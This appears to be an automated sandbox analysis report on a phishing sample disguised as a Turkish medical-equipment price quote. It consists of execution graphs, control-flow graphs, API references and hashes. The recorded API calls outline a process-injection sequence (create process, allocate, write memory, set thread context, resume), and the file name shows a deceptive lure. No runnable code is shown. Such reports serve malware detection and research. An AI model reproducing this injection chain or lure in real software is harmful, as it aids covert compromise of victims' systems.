                                                                                                  execution_graph 34508 7b22430 34509 7b2246a 34508->34509 34510 7b224e6 34509->34510 34511 7b224fb 34509->34511 34516 7b208a4 34510->34516 34513 7b208a4 3 API calls 34511->34513 34515 7b2250a 34513->34515 34518 7b208af 34516->34518 34517 7b224f1 34518->34517 34521 7b22e42 34518->34521 34527 7b22e50 34518->34527 34522 7b22e6a 34521->34522 34533 7b208ec 34521->34533 34524 7b22e77 34522->34524 34525 7b22e8f CreateIconFromResourceEx 34522->34525 34524->34517 34526 7b22f1e 34525->34526 34526->34517 34528 7b208ec CreateIconFromResourceEx 34527->34528 34529 7b22e6a 34528->34529 34530 7b22e77 34529->34530 34531 7b22e8f CreateIconFromResourceEx 34529->34531 34530->34517 34532 7b22f1e 34531->34532 34532->34517 34534 7b22ea0 CreateIconFromResourceEx 34533->34534 34535 7b22f1e 34534->34535 34535->34522 34543 76d6f5a 34545 76d6f64 34543->34545 34544 76d71e2 34545->34544 34549 76d838e 34545->34549 34568 76d8330 34545->34568 34586 76d8320 34545->34586 34550 76d831c 34549->34550 34551 76d8391 34549->34551 34565 76d836e 34550->34565 34604 76d8bf9 34550->34604 34609 76d8a63 34550->34609 34614 76d8821 34550->34614 34619 76d8fa7 34550->34619 34623 76d8ba4 34550->34623 34628 76d90e5 34550->34628 34633 76d8e65 34550->34633 34637 76d8c65 34550->34637 34642 76d8a49 34550->34642 34647 76d88f3 34550->34647 34652 76d8910 34550->34652 34656 76d8794 34550->34656 34660 76d8894 34550->34660 34665 76d8c14 34550->34665 34670 76d8f55 34550->34670 34551->34544 34565->34544 34569 76d834a 34568->34569 34570 76d8a49 2 API calls 34569->34570 34571 76d8c65 2 API calls 34569->34571 34572 76d8e65 2 API calls 34569->34572 34573 76d90e5 2 API calls 34569->34573 34574 76d8ba4 2 API calls 34569->34574 34575 76d8fa7 2 API calls 34569->34575 34576 76d8821 2 API calls 34569->34576 34577 76d8a63 2 API calls 34569->34577 34578 76d8bf9 2 API calls 34569->34578 34579 76d8f55 2 API calls 34569->34579 34580 76d8c14 2 API calls 34569->34580 34581 76d8894 2 API calls 34569->34581 34582 76d8794 2 API calls 34569->34582 34583 76d836e 34569->34583 34584 76d8910 2 API calls 34569->34584 34585 76d88f3 2 API calls 34569->34585 34570->34583 34571->34583 34572->34583 34573->34583 34574->34583 34575->34583 34576->34583 34577->34583 34578->34583 34579->34583 34580->34583 34581->34583 34582->34583 34583->34544 34584->34583 34585->34583 34587 76d834a 34586->34587 34588 76d8a49 2 API calls 34587->34588 34589 76d8c65 2 API calls 34587->34589 34590 76d8e65 2 API calls 34587->34590 34591 76d90e5 2 API calls 34587->34591 34592 76d8ba4 2 API calls 34587->34592 34593 76d8fa7 2 API calls 34587->34593 34594 76d8821 2 API calls 34587->34594 34595 76d8a63 2 API calls 34587->34595 34596 76d8bf9 2 API calls 34587->34596 34597 76d8f55 2 API calls 34587->34597 34598 76d8c14 2 API calls 34587->34598 34599 76d8894 2 API calls 34587->34599 34600 76d8794 2 API calls 34587->34600 34601 76d836e 34587->34601 34602 76d8910 2 API calls 34587->34602 34603 76d88f3 2 API calls 34587->34603 34588->34601 34589->34601 34590->34601 34591->34601 34592->34601 34593->34601 34594->34601 34595->34601 34596->34601 34597->34601 34598->34601 34599->34601 34600->34601 34601->34544 34602->34601 34603->34601 34605 76d8a7a 34604->34605 34605->34604 34606 76d8ff0 34605->34606 34675 76d61a0 34605->34675 34679 76d6199 34605->34679 34610 76d8a69 34609->34610 34611 76d8ff0 34610->34611 34612 76d6199 ResumeThread 34610->34612 34613 76d61a0 ResumeThread 34610->34613 34612->34610 34613->34610 34615 76d8827 34614->34615 34683 76d6909 34615->34683 34687 76d6910 34615->34687 34616 76d87fe 34616->34565 34691 76d6248 34619->34691 34695 76d6250 34619->34695 34620 76d8fc4 34624 76d8baa 34623->34624 34625 76d89db 34624->34625 34699 76d6819 34624->34699 34703 76d6820 34624->34703 34625->34565 34629 76d90eb 34628->34629 34630 76d87fe 34629->34630 34631 76d6909 ReadProcessMemory 34629->34631 34632 76d6910 ReadProcessMemory 34629->34632 34630->34565 34631->34630 34632->34630 34707 76d6758 34633->34707 34711 76d6760 34633->34711 34634 76d8e86 34638 76d8b6e 34637->34638 34638->34637 34639 76d8d9a 34638->34639 34640 76d6819 WriteProcessMemory 34638->34640 34641 76d6820 WriteProcessMemory 34638->34641 34639->34565 34640->34638 34641->34638 34643 76d8838 34642->34643 34645 76d6909 ReadProcessMemory 34643->34645 34646 76d6910 ReadProcessMemory 34643->34646 34644 76d87fe 34644->34565 34645->34644 34646->34644 34648 76d88df 34647->34648 34650 76d6909 ReadProcessMemory 34648->34650 34651 76d6910 ReadProcessMemory 34648->34651 34649 76d87fe 34649->34565 34650->34649 34651->34649 34654 76d6248 Wow64SetThreadContext 34652->34654 34655 76d6250 Wow64SetThreadContext 34652->34655 34653 76d8931 34653->34565 34654->34653 34655->34653 34715 76d6a9d 34656->34715 34719 76d6aa8 34656->34719 34661 76d8bab 34660->34661 34662 76d89db 34661->34662 34663 76d6819 WriteProcessMemory 34661->34663 34664 76d6820 WriteProcessMemory 34661->34664 34662->34565 34663->34661 34664->34661 34666 76d8b6e 34665->34666 34667 76d8d9a 34666->34667 34668 76d6819 WriteProcessMemory 34666->34668 34669 76d6820 WriteProcessMemory 34666->34669 34667->34565 34668->34666 34669->34666 34671 76d8f62 34670->34671 34673 76d6819 WriteProcessMemory 34671->34673 34674 76d6820 WriteProcessMemory 34671->34674 34672 76d918e 34673->34672 34674->34672 34676 76d61e0 ResumeThread 34675->34676 34678 76d6211 34676->34678 34678->34605 34680 76d61e0 ResumeThread 34679->34680 34682 76d6211 34680->34682 34682->34605 34684 76d695b ReadProcessMemory 34683->34684 34686 76d699f 34684->34686 34686->34616 34688 76d695b ReadProcessMemory 34687->34688 34690 76d699f 34688->34690 34690->34616 34692 76d6295 Wow64SetThreadContext 34691->34692 34694 76d62dd 34692->34694 34694->34620 34696 76d6295 Wow64SetThreadContext 34695->34696 34698 76d62dd 34696->34698 34698->34620 34700 76d6868 WriteProcessMemory 34699->34700 34702 76d68bf 34700->34702 34702->34624 34704 76d6868 WriteProcessMemory 34703->34704 34706 76d68bf 34704->34706 34706->34624 34708 76d67a0 VirtualAllocEx 34707->34708 34710 76d67dd 34708->34710 34710->34634 34712 76d67a0 VirtualAllocEx 34711->34712 34714 76d67dd 34712->34714 34714->34634 34716 76d6b31 CreateProcessA 34715->34716 34718 76d6cf3 34716->34718 34720 76d6b31 CreateProcessA 34719->34720 34722 76d6cf3 34720->34722 34723 557d460 34724 557d4a6 34723->34724 34728 557d640 34724->34728 34731 557d62f 34724->34731 34725 557d593 34734 557b0b4 34728->34734 34732 557d66e 34731->34732 34733 557b0b4 DuplicateHandle 34731->34733 34732->34725 34733->34732 34735 557d6a8 DuplicateHandle 34734->34735 34736 557d66e 34735->34736 34736->34725 34536 76d95b0 34537 76d973b 34536->34537 34539 76d95d6 34536->34539 34539->34537 34540 76d3508 34539->34540 34541 76d9830 PostMessageW 34540->34541 34542 76d989c 34541->34542 34542->34539 34737 5574668 34738 557467a 34737->34738 34739 5574686 34738->34739 34743 5574778 34738->34743 34748 5573e28 34739->34748 34741 55746a5 34744 557479d 34743->34744 34752 5574878 34744->34752 34756 5574888 34744->34756 34749 5573e33 34748->34749 34764 5575d1c 34749->34764 34751 5576ffb 34751->34741 34753 5574888 34752->34753 34754 557498c 34753->34754 34760 55744b0 34753->34760 34758 55748af 34756->34758 34757 557498c 34757->34757 34758->34757 34759 55744b0 CreateActCtxA 34758->34759 34759->34757 34761 5575918 CreateActCtxA 34760->34761 34763 55759db 34761->34763 34765 5575d27 34764->34765 34768 5575d3c 34765->34768 34767 55772b5 34767->34751 34769 5575d47 34768->34769 34772 5575d6c 34769->34772 34771 557739a 34771->34767 34773 5575d77 34772->34773 34776 5575d9c 34773->34776 34775 557748d 34775->34771 34777 5575da7 34776->34777 34779 55789eb 34777->34779 34783 557ac90 34777->34783 34778 5578a29 34778->34775 34779->34778 34787 557cd90 34779->34787 34792 557cd81 34779->34792 34797 557b0c1 34783->34797 34800 557b0d0 34783->34800 34784 557aca6 34784->34779 34788 557cdb1 34787->34788 34789 557cdd5 34788->34789 34808 557d339 34788->34808 34813 557d348 34788->34813 34789->34778 34793 557cdb1 34792->34793 34794 557cdd5 34793->34794 34795 557d339 GetModuleHandleW 34793->34795 34796 557d348 GetModuleHandleW 34793->34796 34794->34778 34795->34794 34796->34794 34798 557b0df 34797->34798 34803 557b1c8 34797->34803 34798->34784 34802 557b1c8 GetModuleHandleW 34800->34802 34801 557b0df 34801->34784 34802->34801 34804 557b1fc 34803->34804 34805 557b1d9 34803->34805 34804->34798 34805->34804 34806 557b400 GetModuleHandleW 34805->34806 34807 557b42d 34806->34807 34807->34798 34809 557d2f6 34808->34809 34810 557d342 34808->34810 34811 557d38f 34810->34811 34817 557d170 34810->34817 34811->34789 34815 557d355 34813->34815 34814 557d38f 34814->34789 34815->34814 34816 557d170 GetModuleHandleW 34815->34816 34816->34814 34818 557d17b 34817->34818 34820 557dca0 34818->34820 34821 557d28c 34818->34821 34820->34820 34822 557d297 34821->34822 34823 5575d9c GetModuleHandleW 34822->34823 34824 557dd0f 34823->34824 34824->34820

                                                                                                  Executed Functions

                                                                                                  Function 07B208A4 Relevance: 6.9, Strings: 5, Instructions: 622COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 294 7b208a4-7b22550 297 7b22a33-7b22a9c 294->297 298 7b22556-7b2255b 294->298 305 7b22aa3-7b22b2b 297->305 298->297 299 7b22561-7b2257e 298->299 299->305 306 7b22584-7b22588 299->306 350 7b22b36-7b22bb6 305->350 307 7b22597-7b2259b 306->307 308 7b2258a-7b22594 call 7b208b4 306->308 309 7b225aa-7b225b1 307->309 310 7b2259d-7b225a7 call 7b208b4 307->310 308->307 316 7b225b7-7b225e7 309->316 317 7b226cc-7b226d1 309->317 310->309 326 7b22db6-7b22ddc 316->326 329 7b225ed-7b226c0 call 7b208c0 * 2 316->329 319 7b226d3-7b226d7 317->319 320 7b226d9-7b226de 317->320 319->320 323 7b226e0-7b226e4 319->323 324 7b226f0-7b22720 call 7b208cc * 3 320->324 323->326 327 7b226ea-7b226ed 323->327 324->350 351 7b22726-7b22729 324->351 338 7b22dde-7b22dea 326->338 339 7b22dec 326->339 327->324 329->317 358 7b226c2 329->358 343 7b22def-7b22df4 338->343 339->343 366 7b22bbd-7b22c3f 350->366 351->350 353 7b2272f-7b22731 351->353 353->350 354 7b22737-7b2276c 353->354 365 7b22772-7b2277b 354->365 354->366 358->317 368 7b22781-7b227db call 7b208cc * 2 call 7b208dc * 2 365->368 369 7b228de-7b228e2 365->369 370 7b22c47-7b22cc9 366->370 410 7b227ed 368->410 411 7b227dd-7b227e6 368->411 369->370 371 7b228e8-7b228ec 369->371 376 7b22cd1-7b22cfe 370->376 375 7b228f2-7b228f8 371->375 371->376 380 7b228fa 375->380 381 7b228fc-7b22931 375->381 389 7b22d05-7b22d85 376->389 385 7b22938-7b2293e 380->385 381->385 388 7b22944-7b2294c 385->388 385->389 393 7b22953-7b22955 388->393 394 7b2294e-7b22952 388->394 445 7b22d8c-7b22dae 389->445 399 7b229b7-7b229bd 393->399 400 7b22957-7b2297b 393->400 394->393 405 7b229bf-7b229da 399->405 406 7b229dc-7b22a0a 399->406 433 7b22984-7b22988 400->433 434 7b2297d-7b22982 400->434 426 7b22a12-7b22a1e 405->426 406->426 417 7b227f1-7b227f3 410->417 411->417 418 7b227e8-7b227eb 411->418 424 7b227f5 417->424 425 7b227fa-7b227fe 417->425 418->417 424->425 430 7b22800-7b22807 425->430 431 7b2280c-7b22812 425->431 444 7b22a24-7b22a30 426->444 426->445 437 7b228a9-7b228ad 430->437 438 7b22814-7b2281a 431->438 439 7b2281c-7b22821 431->439 433->326 442 7b2298e-7b22991 433->442 441 7b22994-7b229a5 434->441 446 7b228af-7b228c9 437->446 447 7b228cc-7b228d8 437->447 448 7b22827-7b2282d 438->448 439->448 483 7b229a7 call 7b22e42 441->483 484 7b229a7 call 7b22e50 441->484 442->441 445->326 446->447 447->368 447->369 453 7b22833-7b22838 448->453 454 7b2282f-7b22831 448->454 450 7b229ad-7b229b5 450->426 459 7b2283a-7b2284c 453->459 454->459 462 7b22856-7b2285b 459->462 463 7b2284e-7b22854 459->463 466 7b22861-7b22868 462->466 463->466 470 7b2286a-7b2286c 466->470 471 7b2286e 466->471 474 7b22873-7b2287e 470->474 471->474 475 7b228a2 474->475 476 7b22880-7b22883 474->476 475->437 476->437 478 7b22885-7b2288b 476->478 479 7b22892-7b2289b 478->479 480 7b2288d-7b22890 478->480 479->437 482 7b2289d-7b228a0 479->482 480->475 480->479 482->437 482->475 483->450 484->450
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1331090408.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7b20000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Hq$Hq$Hq$Hq$Hq
                                                                                                  • API String ID: 0-3799487529
                                                                                                  • Opcode ID: 5836d0dd1b88f8dc24b893102ee0a653cfe615e2ff17a517c847d4f02742cfdf
                                                                                                  • Instruction ID: 9021d14d22452ee0dc91bed2e6ff016746b17a22a6fb8fc38eeded86dbca7164
                                                                                                  • Opcode Fuzzy Hash: 5836d0dd1b88f8dc24b893102ee0a653cfe615e2ff17a517c847d4f02742cfdf
                                                                                                  • Instruction Fuzzy Hash: AE328FB0E012158FEB14DFA8C8547AEBBB2FF84300F1581AAD409EB395DE349C46DB95
                                                                                                  Function 05576F90 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1327937016.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fq
                                                                                                  • API String ID: 0-2523619172
                                                                                                  • Opcode ID: 721242e00bb8215b01160ad2398000fecb14c23680c0bad7804be015239408a9
                                                                                                  • Instruction ID: 67933f0b00cbb7baa0269a3904d0bdfff554efe35cfaab21e78f9effa380ba00
                                                                                                  • Opcode Fuzzy Hash: 721242e00bb8215b01160ad2398000fecb14c23680c0bad7804be015239408a9
                                                                                                  • Instruction Fuzzy Hash: 1781D174E012099FDB18DFA9D894AEEBBF2FF88300F248169D405AB364DB345942CF94
                                                                                                  Function 05573E28 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1327937016.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fq
                                                                                                  • API String ID: 0-2523619172
                                                                                                  • Opcode ID: aa13e518cf88a4d92d222a61969e4647d37da7871c80df88902d70ef4f3da625
                                                                                                  • Instruction ID: d727beff7f8ef4ff8d17b637c6f0dc11eee38d91303ec8cc25aec99a3b88e2c1
                                                                                                  • Opcode Fuzzy Hash: aa13e518cf88a4d92d222a61969e4647d37da7871c80df88902d70ef4f3da625
                                                                                                  • Instruction Fuzzy Hash: 5181B174E012199FDB18DFA5D894AEEBBF2FF88300F248169D405AB364DB345942CF94
                                                                                                  Function 07B22518 Relevance: .3, Instructions: 279COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1331090408.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7b20000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 65bb86b66e4f73103da6660e3ad61bce35dcf44353832766f5dfaec906781db6
                                                                                                  • Instruction ID: 636d527128eae1cc280b70c5185e5be86167736c992e82c5a7da6e849dff7dc9
                                                                                                  • Opcode Fuzzy Hash: 65bb86b66e4f73103da6660e3ad61bce35dcf44353832766f5dfaec906781db6
                                                                                                  • Instruction Fuzzy Hash: 3CC15BB1D012298FEB14DF64C8847D9BBB2FF89300F15C5AAD409AB255EB309986DF91
                                                                                                  Function 05574B01 Relevance: .2, Instructions: 203COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1327937016.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f8c9b7d5e6c6eeeda1db518403b0cc4bad1fe8ce8a4e1ccb1a97af55fc2fe603
                                                                                                  • Instruction ID: bf2675afbe3a49c689dc30b0cd1b8aafedd9d82dd2430f5f13e97b7f84f7637e
                                                                                                  • Opcode Fuzzy Hash: f8c9b7d5e6c6eeeda1db518403b0cc4bad1fe8ce8a4e1ccb1a97af55fc2fe603
                                                                                                  • Instruction Fuzzy Hash: 87613697F08646DFCB36947A78163B111C4ABBA0B9F14C7AD5196CE3D3E297C812C362
                                                                                                  Function 076D8816 Relevance: .0, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 64fe9728b56ae9cf94e2cf5af5f946dd26ef7a2da9ebc3cb5f3854d6cac5410a
                                                                                                  • Instruction ID: 6608645e84f2333216c5512b09de3e85c3d503046034c5774b5ba6fe043020d4
                                                                                                  • Opcode Fuzzy Hash: 64fe9728b56ae9cf94e2cf5af5f946dd26ef7a2da9ebc3cb5f3854d6cac5410a
                                                                                                  • Instruction Fuzzy Hash: ADA001C5CBE619E5D02518511808CB9902C838F380E413144801B234129902AC47469E
                                                                                                  Function 076D6A9D Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 645 76d6a9d-76d6b3d 647 76d6b3f-76d6b49 645->647 648 76d6b76-76d6b96 645->648 647->648 649 76d6b4b-76d6b4d 647->649 655 76d6bcf-76d6bfe 648->655 656 76d6b98-76d6ba2 648->656 650 76d6b4f-76d6b59 649->650 651 76d6b70-76d6b73 649->651 653 76d6b5d-76d6b6c 650->653 654 76d6b5b 650->654 651->648 653->653 657 76d6b6e 653->657 654->653 664 76d6c37-76d6cf1 CreateProcessA 655->664 665 76d6c00-76d6c0a 655->665 656->655 658 76d6ba4-76d6ba6 656->658 657->651 659 76d6bc9-76d6bcc 658->659 660 76d6ba8-76d6bb2 658->660 659->655 662 76d6bb4 660->662 663 76d6bb6-76d6bc5 660->663 662->663 663->663 666 76d6bc7 663->666 676 76d6cfa-76d6d80 664->676 677 76d6cf3-76d6cf9 664->677 665->664 667 76d6c0c-76d6c0e 665->667 666->659 669 76d6c31-76d6c34 667->669 670 76d6c10-76d6c1a 667->670 669->664 671 76d6c1c 670->671 672 76d6c1e-76d6c2d 670->672 671->672 672->672 674 76d6c2f 672->674 674->669 687 76d6d90-76d6d94 676->687 688 76d6d82-76d6d86 676->688 677->676 690 76d6da4-76d6da8 687->690 691 76d6d96-76d6d9a 687->691 688->687 689 76d6d88 688->689 689->687 692 76d6db8-76d6dbc 690->692 693 76d6daa-76d6dae 690->693 691->690 694 76d6d9c 691->694 696 76d6dce-76d6dd5 692->696 697 76d6dbe-76d6dc4 692->697 693->692 695 76d6db0 693->695 694->690 695->692 698 76d6dec 696->698 699 76d6dd7-76d6de6 696->699 697->696 701 76d6ded 698->701 699->698 701->701
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 076D6CDE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 467740f6ad1b09aeb571359695c28705bf6fbfe6988e36c989bf3d7200ef9fba
                                                                                                  • Instruction ID: 061741486245b67c082dee6d09261d530b572a50992482acb6f476f9d48510a3
                                                                                                  • Opcode Fuzzy Hash: 467740f6ad1b09aeb571359695c28705bf6fbfe6988e36c989bf3d7200ef9fba
                                                                                                  • Instruction Fuzzy Hash: 80A16EB1D1031ACFEB14DF68C851BDDBBB2BF48350F1481A9D80AA7280DB749995CF91
                                                                                                  Function 076D6AA8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 702 76d6aa8-76d6b3d 704 76d6b3f-76d6b49 702->704 705 76d6b76-76d6b96 702->705 704->705 706 76d6b4b-76d6b4d 704->706 712 76d6bcf-76d6bfe 705->712 713 76d6b98-76d6ba2 705->713 707 76d6b4f-76d6b59 706->707 708 76d6b70-76d6b73 706->708 710 76d6b5d-76d6b6c 707->710 711 76d6b5b 707->711 708->705 710->710 714 76d6b6e 710->714 711->710 721 76d6c37-76d6cf1 CreateProcessA 712->721 722 76d6c00-76d6c0a 712->722 713->712 715 76d6ba4-76d6ba6 713->715 714->708 716 76d6bc9-76d6bcc 715->716 717 76d6ba8-76d6bb2 715->717 716->712 719 76d6bb4 717->719 720 76d6bb6-76d6bc5 717->720 719->720 720->720 723 76d6bc7 720->723 733 76d6cfa-76d6d80 721->733 734 76d6cf3-76d6cf9 721->734 722->721 724 76d6c0c-76d6c0e 722->724 723->716 726 76d6c31-76d6c34 724->726 727 76d6c10-76d6c1a 724->727 726->721 728 76d6c1c 727->728 729 76d6c1e-76d6c2d 727->729 728->729 729->729 731 76d6c2f 729->731 731->726 744 76d6d90-76d6d94 733->744 745 76d6d82-76d6d86 733->745 734->733 747 76d6da4-76d6da8 744->747 748 76d6d96-76d6d9a 744->748 745->744 746 76d6d88 745->746 746->744 749 76d6db8-76d6dbc 747->749 750 76d6daa-76d6dae 747->750 748->747 751 76d6d9c 748->751 753 76d6dce-76d6dd5 749->753 754 76d6dbe-76d6dc4 749->754 750->749 752 76d6db0 750->752 751->747 752->749 755 76d6dec 753->755 756 76d6dd7-76d6de6 753->756 754->753 758 76d6ded 755->758 756->755 758->758
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 076D6CDE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1330386792.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_76d0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 361f8a119603aa3857f18cf4ccf0bffddbee689df374e20f7be4e47d29cd7146
                                                                                                  • Instruction ID: a3575992e23cad451deefa00d578d7403940dc692b8ba6517a898b1473bf8fc7
                                                                                                  • Opcode Fuzzy Hash: 361f8a119603aa3857f18cf4ccf0bffddbee689df374e20f7be4e47d29cd7146
                                                                                                  • Instruction Fuzzy Hash: 8A915BB1D10319DFEB24DF68C850BEDBBB2BF48350F1481A9E81AA7240DB749995CF91
                                                                                                  Function 0557B1C8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 759 557b1c8-557b1d7 760 557b203-557b207 759->760 761 557b1d9-557b1e6 call 5579c38 759->761 763 557b21b-557b25c 760->763 764 557b209-557b213 760->764 766 557b1fc 761->766 767 557b1e8 761->767 770 557b25e-557b266 763->770 771 557b269-557b277 763->771 764->763 766->760 814 557b1ee call 557b450 767->814 815 557b1ee call 557b460 767->815 770->771 772 557b29b-557b29d 771->772 773 557b279-557b27e 771->773 778 557b2a0-557b2a7 772->778 775 557b280-557b287 call 557ae80 773->775 776 557b289 773->776 774 557b1f4-557b1f6 774->766 777 557b338-557b3f8 774->777 780 557b28b-557b299 775->780 776->780 809 557b400-557b42b GetModuleHandleW 777->809 810 557b3fa-557b3fd 777->810 781 557b2b4-557b2bb 778->781 782 557b2a9-557b2b1 778->782 780->778 784 557b2bd-557b2c5 781->784 785 557b2c8-557b2d1 call 557ae90 781->785 782->781 784->785 790 557b2d3-557b2db 785->790 791 557b2de-557b2e3 785->791 790->791 792 557b2e5-557b2ec 791->792 793 557b301-557b30e 791->793 792->793 795 557b2ee-557b2fe call 557aea0 call 557aeb0 792->795 800 557b331-557b337 793->800 801 557b310-557b32e 793->801 795->793 801->800 811 557b434-557b448 809->811 812 557b42d-557b433 809->812 810->809 812->811 814->774 815->774
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0557B41E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1327937016.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: f0c7ff214ec3e7c665e450fdbb44cb3474afd983f9d957357281d3226221a157
                                                                                                  • Instruction ID: 52e4ffe65540d776d5b424ff1eaeb78d4d2959b7499d9eedc2929b067a9e0316
                                                                                                  • Opcode Fuzzy Hash: f0c7ff214ec3e7c665e450fdbb44cb3474afd983f9d957357281d3226221a157
                                                                                                  • Instruction Fuzzy Hash: B2714870A00B098FDB24DF69E5457AABBF2FF88214F00892ED446D7B50EB35E845CB95
                                                                                                  Function 0557590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 816 557590c-5575913 817 5575918-55759d9 CreateActCtxA 816->817 819 55759e2-5575a3c 817->819 820 55759db-55759e1 817->820 827 5575a3e-5575a41 819->827 828 5575a4b-5575a4f 819->828 820->819 827->828 829 5575a51-5575a5d 828->829 830 5575a60 828->830 829->830 831 5575a61 830->831 831->831
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 055759C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1327937016.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5570000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: 3f7ee0aa1e4d7bf93989728e5d61fb21d7380cfd5089425cb8df0c3c6dd25e3b
                                                                                                  • Instruction ID: 0cb52e8805d186dbe40d08d6c88308b50b7b9112d4967265f68b5b12f400d281
                                                                                                  • Opcode Fuzzy Hash: 3f7ee0aa1e4d7bf93989728e5d61fb21d7380cfd5089425cb8df0c3c6dd25e3b
                                                                                                  • Instruction Fuzzy Hash: AE41BFB1C007598BEB24DFA9C884B9EBBF5BB48304F24806AD409AB251DB756946CF54
